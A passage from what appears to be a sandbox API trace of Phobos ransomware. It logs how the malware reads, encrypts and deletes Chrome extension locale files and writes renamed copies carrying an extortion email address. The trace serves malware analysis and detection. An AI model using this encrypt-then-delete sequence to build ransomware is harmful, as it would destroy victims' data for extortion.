Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.306] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.306] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.306] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.306] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.306] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11a, lpOverlapped=0x0) returned 1 [0152.307] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0152.307] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0152.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.308] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.308] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.308] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.308] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.308] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.308] CloseHandle (hObject=0x188) returned 1 [0152.308] CloseHandle (hObject=0x148) returned 1 [0152.308] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json")) returned 1 [0152.309] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0152.738] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=235) returned 1 [0152.738] CloseHandle (hObject=0x190) returned 1 [0152.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json")) returned 0x2020 [0152.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0152.739] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.739] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.739] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.739] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.739] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xeb, lpOverlapped=0x0) returned 1 [0153.232] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0153.232] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0153.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0153.233] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.233] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.233] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.233] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.233] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.233] CloseHandle (hObject=0x190) returned 1 [0153.233] CloseHandle (hObject=0x148) returned 1 [0153.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json")) returned 1 [0153.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.235] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=208) returned 1 [0153.235] CloseHandle (hObject=0x148) returned 1 [0153.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json")) returned 0x2020 [0153.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.235] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.235] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0153.238] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.238] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd0, lpOverlapped=0x0) returned 1 [0153.239] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0153.239] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0153.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0153.240] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.240] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.240] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.240] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.240] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.240] CloseHandle (hObject=0x148) returned 1 [0153.241] CloseHandle (hObject=0x190) returned 1 [0153.241] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json")) returned 1 [0153.242] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.242] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=221) returned 1 [0153.242] CloseHandle (hObject=0x190) returned 1 [0153.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json")) returned 0x2020 [0153.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.243] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.243] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0153.244] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.244] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdd, lpOverlapped=0x0) returned 1 [0153.245] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0153.245] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0153.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0153.247] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.247] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0153.247] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.247] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0153.247] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.247] CloseHandle (hObject=0x190) returned 1 [0153.247] CloseHandle (hObject=0x148) returned 1 [0153.247] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json")) returned 1 [0153.248] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.249] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=191) returned 1 [0153.249] CloseHandle (hObject=0x148) returned 1 [0153.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json")) returned 0x2020 [0153.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.249] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.250] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.250] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0153.250] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.250] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbf, lpOverlapped=0x0) returned 1 [0153.251] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0153.251] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, 